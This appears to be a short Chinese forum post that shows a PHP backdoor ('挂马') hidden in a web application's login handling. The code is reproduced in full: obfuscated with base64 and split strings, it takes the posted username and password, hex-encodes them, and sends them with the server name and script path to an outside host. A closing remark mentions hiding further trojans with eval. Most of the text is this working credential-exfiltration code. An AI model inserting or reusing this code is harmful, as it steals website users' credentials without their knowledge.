如此挂马,不留心还真发现不了:
穿插在程序中间,如下:
if(isset($_POST['use'.'rname']) && isset($_POST['pas'.'sword']))
{
$myhostname =
base64_decode
(
'd3d3LnR'
.
'oaXNkb29yL'
.
'mNvbQ=='
);
$getstring =
base64_decode
(
'L2luL2'
.
'luZGV4Ln'
.
'BocA=='
).
'?g='
.
bin2hex
(
$_SERVER
[
'SERV'
.
'ER_N'
.
'AME'
].
$_SERVER
[
'PH'
.
'P_S'
.
'ELF'
]).
'&u='
.
bin2hex
(
$_POST
[
'use'
.
'rname'
]).
'&p='
.
bin2hex
(
$_POST
[
'pas'
.
'sword'
]).
'&c=other'
;
//print $myhostname;
//print $getstring;
if
(
function_exists
(
'fs'
.
'ock'
.
'open'
))
{
$sockconn = @
fsockopen
($myhostname,80);
@fputs ($sockconn,
"GE"
.
"T "
.$getstring.
" HT"
.
"TP/1."
.
"1\r\nHo"
.
"st:"
.$myhostname.
"\r\nConn"
.
"ect"
.
"ion: Cl"
.
"ose\r\n\r\n"
);
@
fclose
($sockconn);
}
else
{
@
file_get_contents
(
base64_decode
(
'aHR0'
.
'cDovL'
.
'w=='
).$myhostname.$getstring);
}
}
另外使用
eval 植马 并藏的深入些 多藏些! 汗!